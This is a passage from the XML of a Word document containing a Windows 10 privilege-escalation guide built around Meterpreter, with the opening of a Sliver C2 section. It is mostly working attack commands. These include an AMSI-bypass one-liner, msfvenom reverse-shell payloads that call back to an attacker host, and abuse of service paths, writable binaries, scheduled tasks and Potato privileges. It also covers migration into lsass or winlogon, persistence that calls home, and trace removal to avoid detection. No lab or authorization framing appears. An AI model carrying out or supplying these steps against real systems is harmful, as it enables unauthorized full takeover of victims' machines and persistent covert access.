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34DC1" w14:textId="470FF914" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8"/>
    <w:p w14:paraId="37CAB776" w14:textId="6133B7DC" w:rsidR="008319F8" w:rsidRDefault="00CB6E71" w:rsidP="008319F8">
      <w:r>
        <w:t>Through meterpreter:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B894162" w14:textId="7C46D699" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E422A" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>· Active Meterpreter session (x86/x64) running as a non</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>admin user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444CBEAF" w14:textId="6BA4DF47" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>· Ability to upload files and execute PowerShell (even constrained).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E999556" w14:textId="30D2494E" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Phase 1: Enumeration (The “0” Start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CF9F8D" w14:textId="2CE9B904" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>1. Upload PowerUp.ps1 (from Kali: /usr/share/powershell-scripts/Privesc/PowerUp.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F47A69" w14:textId="117AA075" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>upload /usr/share/powershell-scripts/Privesc/PowerUp.ps1 C:\\Users\\Public\\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAF6F0" w14:textId="7872B600" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>2. Bypass AMSI &amp; load PowerShell in Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C703937" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>load powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B3A63" w14:textId="4DDF0807" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>powershell_import C:\\Users\\Public\\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2B536" w14:textId="64F4567F" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Or if powershell_import fails, drop to a PS shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184241B" w14:textId="44CD5FA5" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>powershell_shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149ECAEA" w14:textId="627E26CF" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Inside the PS shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB395E" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8CF1F" w14:textId="6D7AC454" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>. C:\Users\Public\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157B147" w14:textId="1917DB13" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>3. Run full scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB071A" w14:textId="58CEC8E9" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Invoke-AllChecks | Out-File -FilePath C:\Users\Public\scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027F3ABD" w14:textId="12F6765C" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Exit PS shell (exit) and download the results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24862D23" w14:textId="49968B33" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>download C:\\Users\\Public\\scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B311BCC" w14:textId="1CE49BD0" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Phase 2: Analyze Findings (The “Smart” Part)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCAF80" w14:textId="058DD252" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Open scan.txt. Prioritize these high</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>value findings (ranked fastest to slowest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5BABB" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Finding Keyword Ease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45399417" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">AlwaysInstallElevated AlwaysInstallElevated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF30F5F" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">Unquoted service paths Unquoted Service Path </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A18143" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">Writable service binaries/config Modifiable Service / File Permissions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E8A157" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">Modifiable scheduled tasks Scheduled Task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48822A59" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">Registry autoruns (writable) HKLM\Software\...\Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐⭐⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tricky</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDFB6E" w14:textId="0E5429EF" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t xml:space="preserve">SeImpersonate/SeAssignPrimaryToken (check via whoami /priv) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⭐⭐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium (Potato)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D33815B" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8"/>
    <w:p w14:paraId="019F23DD" w14:textId="4AAC855D" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Phase 3: Exploitation (The “End” Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FD560" w14:textId="1BCF6FE6" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Based on findings, pick one method</w:t>
      </w:r>
      <w:r w:rsidR="00D85518">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE98C07" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>A. AlwaysInstallElevated (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADE5AC" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Create an MSI payload and run it as SYSTEM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50DE5D" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8"/>
    <w:p w14:paraId="4C6F5852" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C2704" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f msi -o privesc.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D22C91" w14:textId="76A2B0D2" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>upload privesc.msi C:\\Users\\Public\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25517ED6" w14:textId="24D083D2" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>In Meterpreter PS shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427BA272" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>```powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425C0B5" w14:textId="5707572C" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>msiexec /quiet /i C:\Users\Public\privesc.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828A053" w14:textId="0A3CECC3" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>→ New session arrives as SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B67BF" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>B. Unquoted Service Path (e.g., C:\Program Files\Vuln App\service.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726D577A" w14:textId="1AF95440" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>If path has spaces and is unquoted, place your payload in the hijacked location (e.g., C:\Program.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1CBFE" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=&lt;PORT&gt; -f exe -o C:\\Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D56771" w14:textId="20970C93" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>upload C:\\Program.exe C:\\Program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FB2D1" w14:textId="5B1AC0D8" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Restart the service (check if you have SERVICE_START permissions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBB791" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>sc stop &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3346B6" w14:textId="0503709E" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>sc start &lt;ServiceName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3AA25" w14:textId="7BC9D5EC" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>If you can’t restart, wait for reboot or use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B31C9" w14:textId="0E8A9214" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>shutdown /r /t 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B81EA" w14:textId="59A5DC9C" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>→ New session on boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883AE5E" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>C. Writable Service Binary (e.g., C:\Program Files\Vuln\svc.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576225E6" w14:textId="1F77B5DA" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Replace the binary directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FA7EC" w14:textId="443A5314" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>upload /path/to/payload.exe "C:\\Program Files\\Vuln\\svc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090907C2" w14:textId="3E29C71F" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Then restart the service (same sc commands). If no restart privilege, trigger a crash or wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B40D8" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>D. Modifiable Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D914C6" w14:textId="07772859" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>If a task runs as SYSTEM and the action points to a writable script/exe, overwrite it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FEB191" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>upload payload.exe "C:\\path\\to\\task.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEE603" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Trigger the task manually (if permitted) or wait for its schedule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FACEDE" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>schtasks /run /tn "TaskName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DEE2F4" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>E. SeImpersonatePrivilege (Potato) – if whoami /priv shows it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB58F57" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Modern Meterpreter’s getsystem tries EfsPotato automatically – just run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49019A" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CF5AAB" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>If that fails, use the dedicated module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D63746" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>use exploit/windows/local/efs_potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D135A82" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>set SESSION &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A842483" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A799605" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Phase 4: Get SYSTEM &amp; Migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557D3540" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Once the exploit triggers a new session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F70C69F" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>sessions -i &lt;new_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64808A97" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>getsystem   (if not already SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3251B1FA" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Then migrate to a stable system process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0325859D" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>ps | findstr winlogon   # or lsass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51837794" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>migrate &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8F54AA" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Persist with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFDDD2" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>run persistence -X -i 60 -p &lt;PORT&gt; -r &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD6F85" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Phase 5: Cleanup (Professional End)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C1DED" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>Remove traces to avoid detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4FA6B" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>rm C:\\Users\\Public\\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167B54F" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>rm C:\\Users\\Public\\scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A37AC1" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>rm C:\\Program.exe   (or the dropped payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A91CE6" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>If you replaced a legitimate service binary, restore the original (back it up before overwriting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C674C7" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical Pro Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267ACC3D" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>· If PowerShell is blocked – use execute -f powershell -a "-nop -exec bypass -c \"...\"" directly from Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA00BF" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>· If AV kills PowerUp – use the built-in Metasploit post/windows/gather/enum_patches and post/multi/recon/local_exploit_suggester as alternatives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB8F41" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8" w:rsidP="008319F8">
      <w:r>
        <w:t>· Always check architecture – use sysinfo and match x86/x64 payloads accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B391B9" w14:textId="77777777" w:rsidR="008319F8" w:rsidRDefault="008319F8">
      <w:r>
        <w:t>This 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>end method turns a standard user into SYSTEM in under 5 minutes if any of the above weaknesses exist. Fast, smart, and reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC621D" w14:textId="77777777" w:rsidR="00CB6E71" w:rsidRDefault="00CB6E71"/>
    <w:p w14:paraId="2BA7BA4E" w14:textId="5AFBBCEA" w:rsidR="00CB6E71" w:rsidRDefault="00CB6E71">
      <w:r>
        <w:t>Through sliver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CC689C" w14:textId="77777777" w:rsidR="00CB6E71" w:rsidRDefault="00CB6E71"/>
    <w:p w14:paraId="596B4A67" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006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04124496" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">       ULTIMATE WINDOWS 10 PRIVILEGE ESCALATION GUIDE (0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>TO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDDE8F0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">              Meterpreter &amp; Sliver C2 – Full Spectrum Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E0CBE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006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367B886D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3C2D884D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TARGET: Windows 10 (any build, 1803 – 22H2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2CF7C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> INITIAL ACCESS: Standard user shell (non</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>admin) via Meterpreter or Sliver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E95E5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOAL: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187967D5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASSUMPTION: You can upload files, execute commands, and run PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0491109A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4C369C97" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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62232FB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 0: PRE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>‑</w:t>
      </w:r>
      <w:r>
        <w:t>REQUISITES &amp; MINDSET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490AB720" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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B202EB3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="5CAC6E54" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1. ALWAYS check architecture (x86 vs x64) – payloads must match!</w:t>
      </w:r>
    </w:p>
